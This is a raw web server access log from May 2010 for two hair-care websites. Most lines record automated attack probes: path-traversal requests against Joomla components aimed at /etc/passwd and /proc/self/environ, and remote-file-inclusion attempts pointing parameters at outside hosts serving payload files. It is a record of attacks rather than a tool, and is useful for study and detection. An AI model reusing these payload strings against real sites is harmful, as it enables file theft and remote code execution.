69.175.61.122 - - [17/May/2010:03:27:45 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:28:40 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
208.43.194.3 - - [17/May/2010:03:29:10 -0700] "GET /logs//bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.43.194.3 - - [17/May/2010:03:29:10 -0700] "GET /bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.43.194.3 - - [17/May/2010:03:29:10 -0700] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
114.108.151.149 - - [17/May/2010:03:29:18 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:29:19 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:29:19 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:03:29:54 -0700] "GET /logs/access_100215.log%20%20//bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
114.108.151.149 - - [17/May/2010:03:30:39 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:30:39 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:30:40 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:03:30:56 -0700] "GET /logs//bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.43.194.3 - - [17/May/2010:03:30:56 -0700] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.43.194.3 - - [17/May/2010:03:30:56 -0700] "GET /bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
114.108.151.149 - - [17/May/2010:03:31:53 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:34:17 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:34:18 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:34:18 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:38:25 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [17/May/2010:03:38:26 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [17/May/2010:03:38:26 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
91.214.44.233 - - [17/May/2010:03:40:02 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/0.6 Beta (Windows)" "www.freehairsecrets.com"
91.214.44.233 - - [17/May/2010:03:40:03 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/0.6 Beta (Windows)" "www.freehairsecrets.com"
114.108.151.149 - - [17/May/2010:03:43:26 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [17/May/2010:03:43:27 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [17/May/2010:03:43:28 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [17/May/2010:03:43:31 -0700] "GET /logs/access_100419.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:43:32 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:43:33 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:45:08 -0700] "GET /logs/access_100412.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:45:08 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:45:09 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
216.129.119.12 - - [17/May/2010:03:46:43 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "growlonghairfast.com"
74.208.16.137 - - [17/May/2010:03:48:00 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
202.160.180.23 - - [17/May/2010:03:48:53 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "www.freehairsecrets.com"
202.160.179.49 - - [17/May/2010:03:49:50 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "www.freehairsecrets.com"
74.208.16.137 - - [17/May/2010:03:54:51 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
74.208.16.137 - - [17/May/2010:03:54:52 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
74.208.16.137 - - [17/May/2010:03:54:52 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
74.208.16.137 - - [17/May/2010:03:58:50 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
74.208.16.137 - - [17/May/2010:03:58:50 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
74.208.16.137 - - [17/May/2010:03:58:50 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
193.111.156.198 - - [17/May/2010:04:00:14 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)" "growlonghairfast.com"
193.111.156.198 - - [17/May/2010:04:00:14 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:04:01:42 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [17/May/2010:04:01:42 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [17/May/2010:04:01:43 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
77.88.25.28 - - [17/May/2010:04:05:00 -0700] "GET /freehairsecretsphp/viewtopic.php?p=10198 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
66.249.67.72 - - [17/May/2010:04:06:30 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" "www.freehairsecrets.com"
66.249.67.8 - - [17/May/2010:04:06:30 -0700] "GET /freehairsecretsphp/images/smiles/icon_sad.gif HTTP/1.1" 200 171 "-" "Googlebot-Image/1.0" "www.freehairsecrets.com"
111.89.128.186 - - [17/May/2010:04:13:42 -0700] "GET /logs/access_100405.logwrite.php?dir=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
111.89.128.186 - - [17/May/2010:04:13:42 -0700] "GET /write.php?dir=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
111.89.128.186 - - [17/May/2010:04:13:43 -0700] "GET /logs/write.php?dir=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
193.105.210.173 - - [17/May/2010:04:16:29 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 3.1)" "growlonghairfast.com"
193.105.210.173 - - [17/May/2010:04:16:29 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 3.1)" "growlonghairfast.com"
204.236.211.159 - - [17/May/2010:04:24:26 -0700] "GET /logs/access.log HTTP/1.1" 200 161652 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" "growlonghairfast.com"
74.50.85.15 - - [17/May/2010:04:35:08 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [17/May/2010:04:35:08 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [17/May/2010:04:35:08 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [17/May/2010:04:36:11 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [17/May/2010:04:36:11 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [17/May/2010:04:36:11 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [17/May/2010:04:36:34 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.50.85.15 - - [17/May/2010:04:36:34 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.50.85.15 - - [17/May/2010:04:36:34 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.50.85.15 - - [17/May/2010:04:36:49 -0700] "GET /logs/access_100125.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [17/May/2010:04:37:28 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.50.85.15 - - [17/May/2010:04:37:28 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.50.85.15 - - [17/May/2010:04:37:28 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.50.85.15 - - [17/May/2010:04:37:44 -0700] "GET /logs/access_100125.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.125.181.214 - - [17/May/2010:04:38:41 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.125.181.214 - - [17/May/2010:04:38:41 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.125.181.214 - - [17/May/2010:04:38:41 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.125.181.214 - - [17/May/2010:04:38:57 -0700] "GET /logs/access_100125.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [17/May/2010:04:41:35 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [17/May/2010:04:41:35 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [17/May/2010:04:41:35 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [17/May/2010:04:42:37 -0700] "GET /logs/access_100510.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:04:47:09 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5552 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
89.248.172.14 - - [17/May/2010:04:52:00 -0700] "GET /freehairsecretsphp/index.php%20(200%20ok)%20ACCEPTED HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.freehairsecrets.com"
111.89.128.186 - - [17/May/2010:05:09:23 -0700] "GET /errors.php?error=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
111.89.128.186 - - [17/May/2010:05:09:23 -0700] "GET /logs//errors.php?error=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.195.112.151 - - [17/May/2010:05:11:55 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.112.151 - - [17/May/2010:05:11:57 -0700] "GET /logs/access_100111.log HTTP/1.0" 200 1004971 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.112.151 - - [17/May/2010:05:17:11 -0700] "GET /tmp/?M=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:05:26:27 -0700] "GET /logs/access_100118.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
216.227.218.240 - - [17/May/2010:05:27:53 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck" "growlonghairfast.com"
216.227.221.228 - - [17/May/2010:05:28:11 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/" "growlonghairfast.com"
79.174.72.86 - - [17/May/2010:05:28:14 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "growlonghairfast.com"
79.174.72.86 - - [17/May/2010:05:28:14 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "growlonghairfast.com"
216.227.218.240 - - [17/May/2010:05:28:20 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck" "growlonghairfast.com"
216.227.221.228 - - [17/May/2010:05:28:28 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/" "growlonghairfast.com"
79.174.72.86 - - [17/May/2010:05:29:39 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "growlonghairfast.com"
79.174.72.86 - - [17/May/2010:05:29:40 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "growlonghairfast.com"
216.227.218.240 - - [17/May/2010:05:31:21 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck" "www.freehairsecrets.com"
216.227.218.240 - - [17/May/2010:05:31:21 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck" "www.freehairsecrets.com"
216.227.221.228 - - [17/May/2010:05:31:33 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2" "www.freehairsecrets.com"
216.227.221.228 - - [17/May/2010:05:31:33 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2" "www.freehairsecrets.com"
79.174.72.86 - - [17/May/2010:05:32:25 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)" "www.freehairsecrets.com"
79.174.72.86 - - [17/May/2010:05:32:25 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)" "www.freehairsecrets.com"
79.174.72.86 - - [17/May/2010:05:33:48 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)" "www.freehairsecrets.com"
79.174.72.86 - - [17/May/2010:05:33:48 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)" "www.freehairsecrets.com"
216.227.218.240 - - [17/May/2010:05:34:01 -0700] "GET /logs/access.log/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.freehairsecrets.com"
216.227.218.240 - - [17/May/2010:05:34:02 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.freehairsecrets.com"
216.227.218.240 - - [17/May/2010:05:34:02 -0700] "GET /logs/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck" "www.freehairsecrets.com"
216.227.218.240 - - [17/May/2010:05:34:03 -0700] "GET /logs/access.log/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.freehairsecrets.com"
216.227.218.240 - - [17/May/2010:05:34:04 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.freehairsecrets.com"
216.227.218.240 - - [17/May/2010:05:34:04 -0700] "GET /logs/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck" "www.freehairsecrets.com"
216.227.221.228 - - [17/May/2010:05:34:39 -0700] "GET /logs/access.log/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/" "www.freehairsecrets.com"
216.227.221.228 - - [17/May/2010:05:34:39 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.freehairsecrets.com"
216.227.221.228 - - [17/May/2010:05:34:39 -0700] "GET /logs/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck" "www.freehairsecrets.com"
216.227.221.228 - - [17/May/2010:05:34:58 -0700] "GET /logs/access.log/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/" "www.freehairsecrets.com"
216.227.221.228 - - [17/May/2010:05:34:58 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.freehairsecrets.com"
216.227.221.228 - - [17/May/2010:05:34:58 -0700] "GET /logs/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck" "www.freehairsecrets.com"
216.227.218.240 - - [17/May/2010:05:36:17 -0700] "GET /logs/access.log/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck" "www.freehairsecrets.com"
216.227.218.240 - - [17/May/2010:05:36:17 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.freehairsecrets.com"
